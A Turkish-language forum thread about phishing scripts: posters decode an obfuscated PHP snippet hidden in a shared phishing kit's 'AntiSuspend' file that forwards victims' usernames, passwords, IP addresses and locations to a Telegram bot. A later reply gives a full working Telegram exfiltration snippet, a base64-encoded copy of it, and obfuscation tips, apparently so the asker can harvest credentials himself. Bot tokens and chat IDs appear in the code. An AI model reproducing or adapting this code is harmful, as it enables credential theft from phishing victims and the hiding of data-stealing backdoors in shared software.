Scriptlerden Nasıl Log Çalıyorlar?

arkadaşlar bir scriptin içine düşen kurbanları nasıl çalıyorlar ve nasıl yapabilirim örneğin bir sc içinde bunu buldum biraz şüpheli geldi bu ne işe yarar

eval(base64_decode('CiBnb3RvIEJaTjNTOyBCWk4zUzogJHRva2VuID0gIlw2MVw3MVx4MzdceDM2XDYxXHgzMlw2NFw3MFx4MzFceDMwXDcyXHg0MVwxMDFcMTA2XHg2N1wxMzJcNjdceDM0XDExNlx4NmRceDY4XHg3MVwxNTdceDdhXDEzMlx4MzVceDRjXHgzMlx4NjZcNTVcMTE2XHg3OVx4NzVceDM2XDEyNVx4NThceDM2XDcwXDEyMlwxMDdceDVmXHg0M1wxNTRceDcyXHg0Nlx4NzMiOyBnb3RvIEpwREgxOyBKcERIMTogJGRhdGEgPSBhcnJheSgiXHg3NFx4NjVceDc4XHg3NCIgPT4gIlx4NDdceDc1XDE3MlwxNDVceDZjXHgyMFx4NTNceDQzXHg0NFx4NDFcMTE2XHgyZVwxMlx4YVx4NGJcMTY1XDE1NFx4NmNceDYxXDE1Nlx4YzRceGIxXDE0M1wzMDRcMjYxXHgyMFwxMDFceDY0XHhjNFx4YjFcNDBceDNhXDQwXHg2OVx4NmVceDczXHg3NFwxNDFcMTQ3XHg3Mlx4NjFceDZkXDU2XHg2M1x4NmZceDZkXHgyZiIgLiAkaWQgLiAiXHhhXHhjNVwyMzZcMTUxXHg2Nlx4NzJceDY1XHgyMFx4M2FceDIwIiAuICRwYXNzd29yZCAuICJcMTJceGMzXHg5Y1x4NmNceDZiXDE0NVw0MFx4M2FcNDAiIC4gJHVsa2UgLiAiXDEyXHhjNVwyMzZcMTQ1XDE1MFx4NjlcMTYyXDQwXDcyXDQwIiAuICRzZWhpciAuICJceGFcMzA0XHhiMFwxNjBcNDBceDNhXDQwIiAuICRpcCAuICJcMTJceDU0XDE0MVwxNjJceDY5XDE1MFw0MFx4M2FcNDAiIC4gJGN1cl90aW1lIC4gIlwxMlx4MjBceDIwXDQwXDQwXDQwXHgyMCIsICJcMTQzXDE1MFwxNDFceDc0XDEzN1x4NjlceDY0IiA9PiAiXDYxXHgzOVx4MzhceDM5XDYxXHgzMFw3MVx4MzVceDM1XHgzOCIpOyBnb3RvIHJhdklhOyByYXZJYTogZmlsZV9nZXRfY29udGVudHMoIlx4NjhcMTY0XDE2NFwxNjBcMTYzXDcyXDU3XDU3XHg2MVx4NzBcMTUxXDU2XDE2NFwxNDVceDZjXDE0NVwxNDdcMTYyXDE0MVwxNTVceDJlXDE1N1wxNjJcMTQ3XHgyZlwxNDJceDZmXHg3NHskdG9rZW59XDU3XDE2M1x4NjVceDZlXHg2NFx4NGRceDY1XHg3M1wxNjNcMTQxXDE0N1x4NjVcNzciIC4gaHR0cF9idWlsZF9xdWVyeSgkZGF0YSkpOyBnb3RvIFpyZ3JYOyBacmdyWDog')); ?>

 

kod bloğunu inceledim scriptteki
$sehir
$ip
$ulke
$password
$username
$cur_time
değişkenlerini farklı bir dille şifrelenmiş (sanırım html) telegram tokenine gönderiyor

 

basit bekle

o şifreli kodların altında bu yatıyor

bu O Kodların Kırılmış Hali


<?php gotoBZN3S; BZN3S: $token = "\61\71\x37\x36\61\x32\64\70\x31\x30\72\x41\101\106\x67\132\67\x34\116\x6d\x68\x71\157\x7a\132\x35\x4c\x32\x66\55\116\x79\x75\x36\125\x58\x36\70\122\107\x5f\x43\154\x72\x46\x73"; gotoJpDH1; JpDH1: $data = array("\x74\x65\x78\x74" => "\x47\x75\172\145\x6c\x20\x53\x43\x44\x41\116\x2e\12\xa\x4b\165\154\x6c\x61\156\xc4\xb1\143\304\261\x20\101\x64\xc4\xb1\40\x3a\40\x69\x6e\x73\x74\141\147\x72\x61\x6d\56\x63\x6f\x6d\x2f" . $id . "\xa\xc5\236\151\x66\x72\x65\x20\x3a\x20" . $password . "\12\xc3\x9c\x6c\x6b\145\40\x3a\40" . $ulke . "\12\xc5\236\145\150\x69\162\40\72\40" . $sehir . "\xa\304\xb0\160\40\x3a\40" . $ip . "\12\x54\141\162\x69\150\40\x3a\40" . $cur_time . "\12\x20\x20\40\40\40\x20", "\143\150\141\x74\137\x69\x64" => "\61\x39\x38\x39\61\x30\71\x35\x35\x38"); gotoravIa; ravIa: file_get_contents("\x68\164\164\160\163\72\57\57\x61\x70\151\56\164\145\x6c\145\147\162\141\155\x2e\157\162\147\x2f\142\x6f\x74{$token}\57\163\x65\x6e\x64\x4d\x65\x73\163\141\147\x65\77" . http_build_query($data)); gotoZrgrX; ZrgrX:

Yani Mantık Şöyle işliyor Scripti Beleş Veren Arkadaş AntiSuspend Olarak Adlandırmış siz onu silmiyosunuz tabi onun içindede bu tg logu var
bu şekilde sizin düşürdüğünüz hesaplar anlık olarak scripti paylaşan kişiye gidiyor kodlarda şifreli log olduğunu doğal olarak düşünmüyorsunuz.

AntiSuspend dosyasını silin beleş tertemiz kullanmaya devam edin (Her scde adı antisuspend olmayabilir)

 

basit bekle

o şifreli kodların altında bu yatıyor

bu O Kodların Kırılmış Hali


<?php gotoBZN3S; BZN3S: $token = "\61\71\x37\x36\61\x32\64\70\x31\x30\72\x41\101\106\x67\132\67\x34\116\x6d\x68\x71\157\x7a\132\x35\x4c\x32\x66\55\116\x79\x75\x36\125\x58\x36\70\122\107\x5f\x43\154\x72\x46\x73"; gotoJpDH1; JpDH1: $data = array("\x74\x65\x78\x74" => "\x47\x75\172\145\x6c\x20\x53\x43\x44\x41\116\x2e\12\xa\x4b\165\154\x6c\x61\156\xc4\xb1\143\304\261\x20\101\x64\xc4\xb1\40\x3a\40\x69\x6e\x73\x74\141\147\x72\x61\x6d\56\x63\x6f\x6d\x2f" . $id . "\xa\xc5\236\151\x66\x72\x65\x20\x3a\x20" . $password . "\12\xc3\x9c\x6c\x6b\145\40\x3a\40" . $ulke . "\12\xc5\236\145\150\x69\162\40\72\40" . $sehir . "\xa\304\xb0\160\40\x3a\40" . $ip . "\12\x54\141\162\x69\150\40\x3a\40" . $cur_time . "\12\x20\x20\40\40\40\x20", "\143\150\141\x74\137\x69\x64" => "\61\x39\x38\x39\61\x30\71\x35\x35\x38"); gotoravIa; ravIa: file_get_contents("\x68\164\164\160\163\72\57\57\x61\x70\151\56\164\145\x6c\145\147\162\141\155\x2e\157\162\147\x2f\142\x6f\x74{$token}\57\163\x65\x6e\x64\x4d\x65\x73\163\141\147\x65\77" . http_build_query($data)); gotoZrgrX; ZrgrX:

Yani Mantık Şöyle işliyor Scripti Beleş Veren Arkadaş AntiSuspend Olarak Adlandırmış siz onu silmiyosunuz tabi onun içindede bu tg logu var
bu şekilde sizin düşürdüğünüz hesaplar anlık olarak scripti paylaşan kişiye gidiyor kodlarda şifreli log olduğunu doğal olarak düşünmüyorsunuz.

AntiSuspend dosyasını silin beleş tertemiz kullanmaya devam edin (Her scde adı antisuspend olmayabilir)

bu fotoğraftaki scyi biliyorum denemiştim fakat onun içi şifrelenmemiş, biz bu şekilde şifrelenmiş nasıl yapabiliriz peki aynı şekilde

 

bu fotoğraftaki scyi biliyorum denemiştim fakat onun içi şifrelenmemiş, biz bu şekilde şifrelenmiş nasıl yapabiliriz peki aynı şekilde

sendemi scripti loglamak istiyorsun anladığım kadarıyla doğrumudur?

 

basit bekle

o şifreli kodların altında bu yatıyor

bu O Kodların Kırılmış Hali


<?php gotoBZN3S; BZN3S: $token = "\61\71\x37\x36\61\x32\64\70\x31\x30\72\x41\101\106\x67\132\67\x34\116\x6d\x68\x71\157\x7a\132\x35\x4c\x32\x66\55\116\x79\x75\x36\125\x58\x36\70\122\107\x5f\x43\154\x72\x46\x73"; gotoJpDH1; JpDH1: $data = array("\x74\x65\x78\x74" => "\x47\x75\172\145\x6c\x20\x53\x43\x44\x41\116\x2e\12\xa\x4b\165\154\x6c\x61\156\xc4\xb1\143\304\261\x20\101\x64\xc4\xb1\40\x3a\40\x69\x6e\x73\x74\141\147\x72\x61\x6d\56\x63\x6f\x6d\x2f" . $id . "\xa\xc5\236\151\x66\x72\x65\x20\x3a\x20" . $password . "\12\xc3\x9c\x6c\x6b\145\40\x3a\40" . $ulke . "\12\xc5\236\145\150\x69\162\40\72\40" . $sehir . "\xa\304\xb0\160\40\x3a\40" . $ip . "\12\x54\141\162\x69\150\40\x3a\40" . $cur_time . "\12\x20\x20\40\40\40\x20", "\143\150\141\x74\137\x69\x64" => "\61\x39\x38\x39\61\x30\71\x35\x35\x38"); gotoravIa; ravIa: file_get_contents("\x68\164\164\160\163\72\57\57\x61\x70\151\56\164\145\x6c\145\147\162\141\155\x2e\157\162\147\x2f\142\x6f\x74{$token}\57\163\x65\x6e\x64\x4d\x65\x73\163\141\147\x65\77" . http_build_query($data)); gotoZrgrX; ZrgrX:

Yani Mantık Şöyle işliyor Scripti Beleş Veren Arkadaş AntiSuspend Olarak Adlandırmış siz onu silmiyosunuz tabi onun içindede bu tg logu var
bu şekilde sizin düşürdüğünüz hesaplar anlık olarak scripti paylaşan kişiye gidiyor kodlarda şifreli log olduğunu doğal olarak düşünmüyorsunuz.

AntiSuspend dosyasını silin beleş tertemiz kullanmaya devam edin (Her scde adı antisuspend olmayabilir)

o kadarını ben de görebiliyorum da şu x23/631 tarzı yeri çözemedim

 

sendemi scripti loglamak istiyorsun anladığım kadarıyla doğrumudur?

evet yanlış anlaşılma olmasın kişisel olarak kullanacağım bu şekilde internette paylaşılacak bir olay değil

 

o kadarını ben de görebiliyorum da şu x23/631 tarzı yeri çözemedim

sc loglamayı öğreteyim örnek olarak vereyim buyur bildirim.php adında dosya aç ona bu kodları yapıştır şifrelemek için https://www.base64encode.org/ bu siteye gir bu kodları kopyala yapıştır o şifreli kısmı kopyala bildirim.php 'ye yapıştır kaydet oldu
=>

\\ şifre girilen kısım var // o sayfayı editör ile aç örnek form.php

<?php include 'bildirim.php'
if($_POST){

$token = "5001713708:AAFGbLIaBrEPrJvxgHI1w4hC6iMDXkZU_t8";



$data = [
'text' => 'Aşkım Koş Hesap Düştü 😘

Username: '.$username.'
Password: '.$password.'
IP Address: '.$ip.'
Date: '.$cur_time.'
Country: '.$ulke.'
City: '.$sehir.'
',
'chat_id' => 1248594568
];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
}

?>

// Örnek Şifrelenmiş Kod //

<?php PD9waHAgaW5jbHVkZSAnYmlsZGlyaW0ucGhwJwppZigkX1BPU1QpewoKJHRva2VuID0gIjUwMDE3MTM3MDg6QUFGR2JMSWFCckVQckp2eGdISTF3NGhDNmlNRFhrWlVfdDgiOwoKCgokZGF0YSA9IFsKJ3RleHQnID0+ICdBxZ9rxLFtIEtvxZ8gSGVzYXAgRMO8xZ90w7wg8J+YmAoKVXNlcm5hbWU6ICcuJHVzZXJuYW1lLicKUGFzc3dvcmQ6ICcuJHBhc3N3b3JkLicKSVAgQWRkcmVzczogJy4kaXAuJwpEYXRlOiAnLiRjdXJfdGltZS4nCkNvdW50cnk6ICcuJHVsa2UuJwpDaXR5OiAnLiRzZWhpci4nCicsCidjaGF0X2lkJyA9PiAxMjQ4NTk0NTY4Cl07CmZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwczovL2FwaS50ZWxlZ3JhbS5vcmcvYm90JHRva2VuL3NlbmRNZXNzYWdlPyIgLiBodHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKSApOyAKfQoKPz4=?>

 

Basit php lamerlerinin kullandıgı şifreleme yöntemi (base_64) ile şifrelenmiş bir küçük kod.
Decode ederek baktıgımda; k.adı, şifre, ip adresi gibi bilgileri telegram api üzerinden kendisine yolluyor, az çok php bilen birileri bile bunu çözebilir.
++ olarak, x23/361 tarzı yazan yerleri de html ile şifrelemiş biraz zeki çıktı arkadaş.

 

Basit php lamerlerinin kullandıgı şifreleme yöntemi (base_64) ile şifrelenmiş bir küçük kod.
Decode ederek baktıgımda; k.adı, şifre, ip adresi gibi bilgileri telegram api üzerinden kendisine yolluyor, az çok php bilen birileri bile bunu çözebilir.
++ olarak, x23/361 tarzı yazan yerleri de html ile şifrelemiş biraz zeki çıktı arkadaş.

YUKARIDAKİ ARKADAŞIN ANLATTIĞI ŞEKİLDE YAPAR İSEK DECODE EDİLDİĞİNDE HERŞEY ORTAYA ÇIKIYOR HTML ILE ŞIFRELEMIŞ DERKEN ONU NASIL YAPIYORUZ

 

YUKARIDAKİ ARKADAŞIN ANLATTIĞI ŞEKİLDE YAPAR İSEK DECODE EDİLDİĞİNDE HERŞEY ORTAYA ÇIKIYOR HTML ILE ŞIFRELEMIŞ DERKEN ONU NASIL YAPIYORUZ

Encode ile yapıcan kanka onuda

 

Encode ile yapıcan kanka onuda

html encode değil sanki bu html decoder bunu çözmüyor çünkü

 

html encode değil sanki bu html decoder bunu çözmüyor çünkü

encode hocam decoder belli bir yere kadar çözer icube gibi paralı encode ler var onları 8 9 saate çözülür ancak
(Her baba yiğitin ahrcı değildir merak etme satın al koy gitsin )